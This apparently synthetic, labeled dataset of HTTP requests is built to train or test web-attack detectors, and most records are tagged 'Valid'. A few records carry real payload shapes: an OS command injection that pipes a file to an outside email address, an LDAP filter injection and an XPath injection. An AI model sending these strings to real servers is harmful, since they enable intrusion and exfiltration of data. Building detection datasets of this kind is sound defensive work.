Referer: /knaort/aiide/heaub1.jsp
TE: trailers,gzip;q=0.8,gzip
Trailer: Connection
User-Agent: w7pfr7dy/4.8.1.2
UA-CPU: 68000
UA-Disp: 710,919,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3648x172
Via: 8.1 www.e4Rmfh.htm:2477, 4.6 167.196.80.19:56092
Transfer-Encoding: compress
Upgrade: fr2/0.9
Warning: 722 37.71.188.90 "iftrtm47sdah" "Fri, 17 Jul 09 01:24:55 UTC"
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 5433664
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 955
Start - Id: 31174
class: Valid
GET /eK8/atsemmtEuEisb/9zplmrdl/lOM2agLYx5TGnq2Shrh/z7v5WcXps/9mGk1SQn/7sianro2inlt/1beI6MAo3.gif?gqnvdtefygar=oO09XP&gnui2cji1tok4=e5%2Bselecth%3Ce+deleteiframesNeswwp-rstt&mle5=T%2Beincludefmt%29en&oKxtd4KHyJs=+taphpa&WhirYsprdhp=smh&reIu6aIe=2eWF6 HTTP/1.1
Host: www.tefroadsi1.cz
Connection: close
Accept: video/*;q=0.4, audio/x-wav, video/*
Accept-Charset: ks_c_5601-1987, windows-1253;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: Taeta-aEceEsh, es-er;q=0.7, eduAi0-ce;q=0.2, oaniue-rhHe2ni
Cache-Control: no-transform
Client-ip: 72.12.227.203
Cookie: iDaizezwh=roxp_Mrjrrnwherel\t0=r;tncv9ehlnh=31sagmttli
Cookie2: $Version="352"
Date: Sat, 11 Jul 09 04:51:10 UTC
ETag: W/"fQ1DqsM.rEkeMZ-"
Expect: 100-continue
From: xdis0@redoex.de
If-Modified-Since: Sun, 01 Oct 06 03:59:57 GMT
If-Unmodified-Since: Thu, 10 Sep 09 01:09:14 UTC
If-Match: *
If-None-Match: "seCv2shz6MxIOmI"
If-Range: *
Max-Forwards: 27
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: NTLM d2xuYVJzbk90dGZic3NuaGlya3hlb2x4YXBoWWF0SWRCeA==
Range: 41-,7530-978
Referer: /hiucio/hrdtgm/f7ei3s/Odsony.nsf
TE: chunked;q=0.2,trailers
Trailer: Accept
User-Agent: Mozilla/4.4 (X11; U; Open BSD i386 6.1; dp-el; rv:1.4.4) Gecko/92757842
UA-CPU: StrongARM
UA-Disp: 2491,001,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7646x4515
Via: 8.0 www.esorecn.jpeg, HTTP/3.8 www.e3ho.png
Transfer-Encoding: compress
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 047 www.AtoX9nes.js "hsmitves7S" "Sun, 30 Aug 09 10:25:13 CET"
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31174
Start - Id: 17703
class: Valid
GET /c3ogtr5nctdaiiv/daZTvX/tcTgoBO/ewFSZqumTlGJV0mbTyw/naejnw/3nRokn-pKMBFRVJwS/awslncc/dreIiie8neittvaigt/eI1GQ6ONLFYyV-Xn.aspx?ntTstc=69668&steudke=8780130919&ayeEuee=nohlvur&etyzzigrreli10=7t%3C&kLuhuwVjDa=iee&owaahSeemfignsh=%5Bxgn&Ejnar2pan3yrbo=anFtsoptosopenMemupdateiwgCws HTTP/1.1
Host: www.ihrrlsiett.net:80
Connection: close
Accept: audio/basic;q=0.0, video/*, text/*;q=0.6
Accept-Charset: iso-2022-kr;q=0.2
Accept-Encoding: 
Accept-Language: nTiPns-xt2eni;q=0.4, ere-nAXg
Cache-Control: Hwhre=deideot
Client-ip: 142.96.191.196
Cookie: sItowe= fatdst;sehOi=risnetrl3;O2ahu=dwmm;rw6ou=99302;rj=HEhustae
Cookie2: $Version="8"
Date: Thu, 27 Apr 06 02:39:40 UTC
ETag: W/"RlvvOiuDFYgKT3Y@_L"
Expect: dIhE=yjonsoC;cjwnf
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 29 Jan 08 08:19:08 UTC
If-Unmodified-Since: Sun, 02 Jul 06 04:33:43 CET
If-Match: "jRB77TnxZootLh2yIe3"
If-None-Match: "dBz_FfbAVTRxusjboD"
If-Range: *
Max-Forwards: 3603
MIME-Version: 4.2
Pragma: or='ex4in'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: AMsas teetvwf=eidyws
Range: -579,-690
Referer: /eaecfesl/h2mtirai.jsp
TE: deflate;q=0.7,gzip;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/4.2 (X11; U; Linux i586 9.8; rb-ai; rv:3.7.9) Gecko/08466551
UA-CPU: PowerPC
UA-Disp: 4852,629,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: 3.5 179.155.178.211, 5.3 www.mrat2.jpeg
Transfer-Encoding: deflate
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 167.172.138.87
X-Serial-Number: 197606037
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17703
Start - Id: 43429
class: OsCommanding
GET /gmNh7otibchioETyslo/eN3Q/DXxdrophG3KMk/O.echop2passwd0tNey/rx.4FbM3nullpositionaP74/tkeeh6c8eneei/eVpIT.Uht/0jhj./eGBd/nFIjo_fffDKzko4Q6H.jpg?s7zJKEU=%27+++%3B++++cat++++%2Ftmp%2Fres+mail+++itliet%40anmeli.com+++%3B&k2PZD=2maneehafAreseo&aldy9n4ncw=90910487 HTTP/1.0
Host: www.ne7raqeh.org
Connection: dnhiEtce
Accept: audio/basic, audio/basic;q=0.8, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 230.11.35.165
Cookie: us0t4nR5goo=12263337;soohEale9Hee=%(rc0aIolo9;o?d;zoh=wiem
Cookie2: $Version="368"
Date: Fri, 19 Dec 08 12:37:43 UTC
ETag: "LXuX1YfEDWDYmg@8e"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Tue, 06 Apr 10 02:01:48 CET
If-Unmodified-Since: Tue, 24 Feb 04 08:41:28 UTC
If-Match: *
If-None-Match: "@hkRObiO4mRb77d6"
If-Range: Fri, 16 Nov 07 15:11:23 UTC
Max-Forwards: 39
MIME-Version: 7.3
Pragma: csirt4un=ace
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: NTLM dWgybmV4YTZrckFPQXFoY29mTm9laGhsdU50OXduZHZodFpFdFRz
Range: 5130-,89497-47998,93-50140
Referer: http://ehyirea.uk/oitiu/krhE/eAie/eEly2p.php4
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/9.3 (X11; U; Unix 4.3; ee-ns; rv:3.8.2) Gecko/79762636
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: uwatc/0.4 www.le8sodo.html
Transfer-Encoding: identity
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43429
Start - Id: 32922
class: Valid
POST /rlRhW8F.gO9sEvX.gif? HTTP/1.0
Content-Length: 146
Content-Language: ctaC5
Content-Encoding: gzip
Content-Location: http://www.9reDniun.it/8o6ey/rnur/ii2SE/8Il5/sfone3s.css
Content-MD5: Zm9kbDhva29taUVvZWV5Tw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Dec 04 20:27:23 CET
Last-Modified: Sun, 16 Jan 05 15:41:38 UTC
Host: 46.172.23.50:80
Connection: zeewe
Accept: image/png, video/*;q=0.9, application/rtf
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.7, identity;q=0.2, gzip, compress;q=0.6
Accept-Language: nhfNth-tktacfd;q=0.9
Cache-Control: only-if-cached
Client-ip: 225.68.246.241
Cookie: swThlmir0upDo=uJRk;mito2=tO@2n
Cookie2: $Version="8"
Date: Wed, 26 Apr 06 03:03:00 GMT
ETag: "zdNFJpd@b7FdQCVXkMk"
Expect: 8w6r=noFson;lnYaAf=Anaifitt
From: Qtafer@rrotHx.be
If-Modified-Since: Sun, 12 Jun 05 13:52:28 CET
If-Unmodified-Since: Wed, 30 Sep 09 09:01:58 UTC
If-Match: "V6dAuKid.-jImEvjyW"
If-None-Match: "UAJQCJ2kqiY1WlXj"
If-Range: Wed, 24 May 06 07:12:39 CET
Max-Forwards: 207
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oiAtpy"
Authorization: NTLM c3d0ZTltNHNhbmFlcm91aHRvc3FlOWFvdXRmbmVic2Vvcm9iNA==
Range: 4-
Referer: /erdtdph.swf
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: nNoG2S http://www.toins.de
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6323x133
Via: FTP/1.4 www.aAeetj.html, oz0/7.7 www.Rxad.js:598
Transfer-Encoding: deflate
Upgrade: jie/1.0, iaAlda/7.0
Warning: 042 55.252.234.189 "mLniet61zeaoq" "Tue, 18 Nov 08 09:37:46 UTC"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: --------------------
~~~~~: ~~~~~~~~~~~~~

ptEto=6361351&iadyseuqusee5=nnod7inia&le=apq-U9g7@lU&ehttemEs1ymwuht==hlde&vbsivCd=7144543&nhho8sbtlm=enetcat&e3ieaaisA=8 epmsk]dnlxnyeJmhla

End - Id: 32922
Start - Id: 33278
class: Valid
PUT /Cv@r4HWh8Onpassthru/shses/t@oh.xsVjb-BJat8l5_/Seghwob5totenNee/hqV/tyegtv2e6e7u.html? HTTP/1.1
Content-Length: 116
Content-Language: t8H,n
Content-Encoding: gzip
Content-Location: http://q7maa.com/tgogn/xrrol/e4re/Dimuenx.css
Content-MD5: N3VlN2gwRGxpckVjOGhTcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Oct 05 11:33:42 GMT
Last-Modified: Sat, 20 Dec 08 16:43:08 UTC
Host: www.zhnhg.net
Connection: close
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: compress;q=0.6, deflate, gzip;q=0.0, deflate;q=0.3, gzip;q=0.6
Accept-Language: ed2Fsmat-oiSj;q=0.9, vea-ex4sR, eu6lf-cfhxfoe;q=0.9, 9-puobPqHb
Cache-Control: min-fresh=5437
Client-ip: 180.76.82.0
Cookie: b5sv7a=atrtkwhns2EnUbs;tbrh=enkionuylda2aiLdmn;C6Ktnph-CdB=10292;iqme=Ghb
Cookie2: $Version="0"
Date: Sun, 21 Dec 08 06:26:12 UTC
ETag: "mlBguQKK@9ZhS-mW"
Expect: 100-continue
From: oeunn0@celeoof.com
If-Modified-Since: Thu, 08 Feb 07 23:13:50 CET
If-Unmodified-Since: Thu, 17 May 07 22:32:36 UTC
If-Match: "4qoOsaQ1.1G0pUP-JW_"
If-None-Match: *
If-Range: Mon, 21 Jan 08 06:42:31 CET
Max-Forwards: 67
MIME-Version: 2.9
Pragma: sw='tI4e'
Proxy-Authorization: 2o8P wnoasn=nssdM
Authorization: beZe4O acg0=haio6t
Range: -28,-55,-1007
Referer: http://www.eki46i5.gov/dejbskS.pdf
TE: trailers,gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/7.4 (X11; U; Open BSD i386 7.7; oe-lf; rv:5.8.2) Gecko/44335731
UA-CPU: x86
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8624x050
Via: xcrtdm/2.8 162.202.143.13
Transfer-Encoding: compress
Upgrade: olEewx/5.1
Warning: 216 98.195.83.109 "myymAJnoiocc" 
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 09187614917730
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

vzeo=2perll>6@1jaoo&btonepaattcees=e&selectzIohLQr=710&bmiyc8qitmol8oc=5075&hnutve=ninputtoa&r8t=teohrhmleouaeae

End - Id: 33278
Start - Id: 34255
class: Valid
PUT /9sevsS.js? HTTP/1.0
Content-Length: 268
Content-Language: am
Content-Encoding: identity
Content-Location: http://www.saRobd.biz/5mvunt1/aopartm5/elg7Eh/ebgn5fg/dtxtau.pl
Content-MD5: ZWFvNm5hdXR4ZW50VW95ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Apr 09 16:31:09 UTC
Last-Modified: Fri, 17 Dec 04 06:53:26 UTC
Host: 24.90.16.216:80
Connection: AraaW
Accept: text/*, image/*
Accept-Charset: iso-8859-3, shift_jis;q=0.9, x-mac-hebrew;q=0.2, windows-1257;q=0.8
Accept-Encoding: identity;q=0.5
Accept-Language: *
Cache-Control: max-stale=6389
Client-ip: 203.243.153.73
Cookie: iilHbsesJh=nerN4uOS;rur=p5Ttislot=;dteo12=+y+htacces
Cookie2: $Version="37"
Date: Tue, 29 Jul 08 12:56:02 UTC
ETag: "ZUb3NgfZ7AS9Q8PdLz"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Wed, 09 Feb 05 07:11:31 CET
If-Unmodified-Since: Wed, 06 Sep 06 04:15:54 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Nov 04 02:30:43 GMT
Max-Forwards: 33
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest username="rtalafh1"
Authorization: NTLM aWJpZTRiZXR0aHRibGNtZHE5bGxkM3ljZGRvaXNqNmRlbXlFZWFybw==
Range: -804943,968106-
Referer: /ehnNud/ilbs/eleLb/Warj/enpSu.msf
TE: chunked,trailers,gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.6 (compatible; tEautdomct; Unix; Vn3e; Yswe; adtta)
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5781x4344
Via: HTTP/7.0 www.hr1uEh.html
Transfer-Encoding: deflate
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 70.193.7.214
X-Serial-Number: 316874692201616
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aoeszsd=tia~&fQeNgVd=986&ethfl=ntttpkaeweaLn8&drwl=39548093&pfot72aitdln3b=17&cPrZo=0342279&a4ltuuR=oijcoivvloAaaS7cf&aaflesoousTu=gt]ruN&S7document3h0l luc&raaoaiehcssgewn=7&haRg1Ei=tasamasrJ&nullqHy-UQ4.h99=wtbncatskbl&Ileehicc=6925996586&XU@8FyjEVwinnt=hf0ceo

End - Id: 34255
Start - Id: 591
class: Valid
GET /oRLO2Lc_/pvK3.dll?-.j@YVwindow.open6wnode=waan&bota=+Kitt+%24ng8oo8rusranexec&itw4=sbkiehtmigtrh&eEyshrIhLntotek=cform+d%7EvAPcrhrsh%5C&gfh3=36&lsjh5veshpQ=88&on6ctstilowi=dtyw3m3omBqDvep9i&seot0hteixyrit=94087284&achlnecE8nr5u=udit&thN=+2&xEei7l=ig_7wJKKs5Ue&lzeeaenlt2eehh=+tErcp+cEe HTTP/1.0
Host: 47.207.13.248
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 36.96.211.242
Cookie: eebinnr=9tnewdssezrenfesSe;leJsoHaos=stredeolm
Cookie2: $Version="482"
Date: Wed, 31 Dec 08 02:02:32 CET
ETag: "VyiZ8hXG6jlDRK.MpG_"
Expect: tsxtsee=qblo;ntlk
From: i7wh@s1dUih1sA.it
If-Modified-Since: Mon, 19 Apr 04 17:23:45 GMT
If-Unmodified-Since: Tue, 12 Feb 08 15:47:03 UTC
If-Match: *
If-None-Match: "DvB1wENmWa1rqhv"
If-Range: *
Max-Forwards: 2959
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM aWVlZW9kdHVhbUFnaTdtZGVzZU5yZ2dRMW51bHdhV2Nlbm1yYw==
Authorization: 3trot unnhgOE=erlyc
Range: 00-
Referer: /amet/4teX/0hae/8pcAhtn.tar
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: ennKts45Grlsa
UA-CPU: Sparc
UA-Disp: 8563,166,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 412x961
Via: sUtit/6.0 147.196.248.44:27045, FTP/8.4 www.fnan.jpeg
Transfer-Encoding: identity
Upgrade: thc/6.8
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 119.10.246.153
X-Serial-Number: 812808464
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 591
Start - Id: 33477
class: Valid
POST /v5O2I/rtcdncdeKqrdiei/aGKXdKlc/phnletsera/fRHZXzUGbkHjwENg0S/nTb3@8OEhjGBzDAT.J/n21/divw.tmpNaitQ/rhn-.VTyMHA6rv/9dYSoaaotcya/bReeeb3dqnOhr.png? HTTP/1.0
Content-Length: 120
Content-Language: otadSnn,6Nais
Content-Encoding: identity
Content-Location: http://swTry8gs.com/ySteRl/cLlUe/etnof/tdai.pdf
Content-MD5: ZTBvVTlUbHlhZWFhcmVpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Jun 09 19:53:44 GMT
Last-Modified: Fri, 20 Mar 09 20:07:02 UTC
Host: 9.253.145.115
Connection: close
Accept: video/*, application/zip, video/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: nonsii-sd, eom8e-ueees0tq;q=0.0
Cache-Control: max-stale=225
Client-ip: 223.229.235.206
Cookie: y2o3onf=39;aorfsBnaInd=0013;ltiih=vu1exsr8n7e3e;3oak6to1=iDfvg-6;DD=800;qs=u
Cookie2: $Version="2"
Date: Tue, 28 Oct 08 22:34:50 GMT
ETag: "N@YIkvlv7W2brt-"
Expect: oetImrSk
From: haatwh@aC7Dxl.ch
If-Modified-Since: Thu, 14 Sep 06 21:57:45 CET
If-Unmodified-Since: Tue, 26 Oct 04 09:16:59 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 313
MIME-Version: 6.6
Pragma: t8wenh=a3mh8r
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: Digest response="f7bBfbe605f27eEca48cAddBf56aaD6C"
Range: 408-106,8887-956063
Referer: /nqtLcueo/q8se/J72nkO/eun5/NyeCh.jsp
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/1.1 (compatible; Konqueror/0.3; Linux i586; sopmPaeP; eyhi; beuFirttOh)
UA-CPU: Sparc
UA-Disp: 0089,4532,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: urjha/8.6 www.9sahl.jpg
Transfer-Encoding: compress
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 159.146.237.86
X-Serial-Number: 944908095975390
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

WFJxtermSl=ia4&KxLjX_-B.=2&W1dwhere1-XJjt_=h]ltratt&ciSoagcola=rr|between&tbfeseeje=u9GCtvj&ant=sn&3npohl=rasse7tGhc

End - Id: 33477
Start - Id: 38325
class: LdapInjection
GET /L2t/vkjA_FycWi1/wf3ewizdamdnAhe/h@C/c3RHI6_SSOE7AT8/sR_osNr2_un/aliin/d3TM1iB/nbb5yJ_j3whp/Eeifi.aspx?soTi14geeb06Hfj=3u6djkxat&aroo6anlyee=3289675&alh=%29+%28%7C++%28cn%3D*o+++%27brien*+%29%28mail%3D*o+%27brien*++%29++++ HTTP/1.1
Host: www.eeultsst.uk
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.4, iso-8859-9, utf-8;q=0.6, iso-8859-7;q=0.3
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: aat-ihrcsy, vniejl-gl;q=0.3, egauqbpm-o4ri9it;q=0.4, ioEcrwen-7Tue, ichfcioe-Tn;q=0.2
Cache-Control: no-store
Client-ip: 164.173.253.218
Cookie: ru=8;tesseenehaldd=ocOKh
Cookie2: $Version="66"
Date: Wed, 11 Nov 09 07:45:53 GMT
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: etae@mLte.st
If-Modified-Since: Sun, 11 Jan 04 09:10:30 CET
If-Unmodified-Since: Sat, 30 Jan 10 15:23:52 CET
If-Match: "_DaoADa4rUR2024s"
If-None-Match: *
If-Range: *
Max-Forwards: 945
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest algorithm=iilrEe
Range: -717,218781-
Referer: http://www.reeFuEth.cz/adh2od/4resfl/NitN/ieza4thi/olej.tar.gz
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: fB5iWqN4A http://www.TmtuEsi.st
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: deflate
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38325
Start - Id: 12179
class: Valid
GET /8nahi11ohalTtj5l2ei/SkoVfromnodeVo/39bodyWEfHSSM/ivttigdhht/ruoAAEbNl/ANsnRotuiie6a/tvTlXO1wZO.jpg?otiaylvsafEaxa=e&1purotA=%7Ene&oodmt2aenm=%25RrUaLaezntASih&losngria=s%40I8f&likefvzYhavingi=alst3tiihx&neVot=aedatbh3ntt&aiEhs=riynt HTTP/1.1
Host: www.bwf0.it:80
Connection: Risy
Accept: video/*;q=0.2, video/quicktime;q=0.4, video/quicktime
Accept-Charset: ks_c_5601-1987;q=0.5
Accept-Encoding: 
Accept-Language: aud-9;q=0.4, Svzlt6ur-teemn8or;q=0.0, bOtriAl-ssAelnos;q=0.8, thnsmEei-ylqNor
Cache-Control: max-stale=2416
Client-ip: 73.101.25.255
Cookie: dnl=eIQWo_07XKC;lfsSfh='t;r0et=924287;RTn9ifouOtnLgL=4t
Cookie2: $Version="27"
Date: Wed, 25 Jan 06 17:03:43 GMT
ETag: "J-w@mMWx0qoLlL8"
Expect: ureQ7fow
From: eeotsLel@forahartri.net
If-Modified-Since: Fri, 06 Feb 04 06:02:16 GMT
If-Unmodified-Since: Sat, 21 Aug 04 15:44:37 GMT
If-Match: "o6KA9HsqjIhDJMEf6Nn"
If-None-Match: "FmT@w-MJ8Go.B--W"
If-Range: Thu, 27 Aug 09 24:56:02 CET
Max-Forwards: 4894
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: lert mmeei=fdhn
Authorization: Digest algorithm=MD5
Range: -242768
Referer: /eheu/stIa/u4cc.tiff
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 2.8; ty-e8; rv:2.4.5) Gecko/04257614
UA-CPU: 68000
UA-Disp: 3158,9578,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x2699
Via: 2.7 www.dioumEb.tiff:434, 1.1 203.103.163.33, 5.2 38.14.63.90
Transfer-Encoding: compress
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 36511935
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12179
Start - Id: 14427
class: Valid
GET /oPddE3HSlBZu/lonnzotnacixreyo0yp/fncSeharhil/odrNoesdUe2E/evarDCLGF/cIAtiuhleRhyjdf/hereplaceg/wIb_boot.iniDHTY6D/eo0MYcDcBme4KRjyL/ejL6mt/naAbpE4erO.php3?totJhtR=PhumEleI7Nwhttp&aahrt=xp_uewI%2BstyleVgsUdsLe&5oe=910&ee=tso&oct3atahenuaot=52 HTTP/1.0
Host: www.9eoifHque0.fr
Connection: keep-alive
Accept: text/*;q=0.3, image/jpeg, image/*
Accept-Charset: x-mac-chinesetrad;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 239.225.229.87
Cookie: w5orst=oowuenrwfir
Cookie2: $Version="40"
Date: Fri, 25 Apr 08 13:50:42 UTC
ETag: "OsYxLwVikYPQxYqKb"
Expect: vosa
From: eeruerum@ttseykhtas.gov
If-Modified-Since: Tue, 13 Dec 05 21:50:51 GMT
If-Unmodified-Since: Thu, 09 Nov 06 06:38:22 UTC
If-Match: *
If-None-Match: "IMSuC0kr7GMPr02b2pqZ"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Letted rWnhgaAo=tiitsc
Authorization: NTLM NmVyZWZrcmJsb3RyaWVQaGkwWWlnaGVlRW1paG9zNGJveDNzY2ZNVGFB
Range: 95-
Referer: /serttLi/UiDyKnod.txt
TE: trailers,deflate,chunked;q=0.2
Trailer: Proxy-Authorization
User-Agent: 27yr1j0/6.3.0.4.2
UA-CPU: MIPS
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: 0.2 108.20.84.18
Transfer-Encoding: eetrms
Upgrade: rean/3.6, zmcrDo/5.0, aoielb/7.5, Hearne/3.1
Warning: 696 www.x5erorr.gif "amRedorfoi9a" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14427
Start - Id: 35556
class: XPathInjection
PUT /5YOcnab/Iw/aeojsediEZudhE/13aaueia2rees/rmtnwr9te2iwsTD/3o4jdh_fqDBG.exe? HTTP/1.1
Content-Length: 257
Content-Language: t6,ysdD
Content-Encoding: compress
Content-Location: /nkhtLsr/cBut/xpsSciki.swf
Content-MD5: aHlUNXJuZ0FzdGltcHljSA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Thu, 26 Jul 07 04:48:26 UTC
Host: www.ihiAtn.org
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.3, windows-1257;q=0.4, x-mac-arabic;q=0.0, euc-kr;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 254.29.59.241
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="65"
Date: Wed, 20 Dec 06 19:59:50 GMT
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Tue, 27 Oct 09 13:05:43 UTC
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Sep 04 02:45:40 GMT
Max-Forwards: 67
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM U3ZOYUNzdG5lZnE4d2V5cGZxTmNzbnByYWxlVzZvTWFyNHRvdGhzcw==
Range: 1158-964,-612192
Referer: /Ecis/mFztnumr/tearzmov/tbajte/Mtp3o.asp
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Match
User-Agent: up7TgdI (1RZQ7kr-_)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 174x8533
Via: 9.4 1.19.245.236
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 491 www.obverec.js "eapntohnl" "Thu, 19 May 05 14:19:45 GMT"
X-Forwarded-For: 110.77.12.7
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xdimoesthlEa3wr=832&kQm--TEOPB8=9KwykLg4tr&Pziwhere12OPUhperls=0 or   itet/Ae4ah/lu/child::node()[position()=201] or   48=&tq8dcoai4T=httpzeh:&w2lEilufn=N;R&@jO8hetcZ9p=eASTtgZJ0S&qm3lhWvsGw4d=733&htaasDbo=88004&Ed6cNEfri=09062

End - Id: 35556
Start - Id: 33082
class: Valid
PUT /lgjjBvnyYHrw5WqQdqY/ge7uitta8cedru/UKor9G.jpeg? HTTP/1.1
Content-Length: 287
Content-Language: o
Content-Encoding: identity
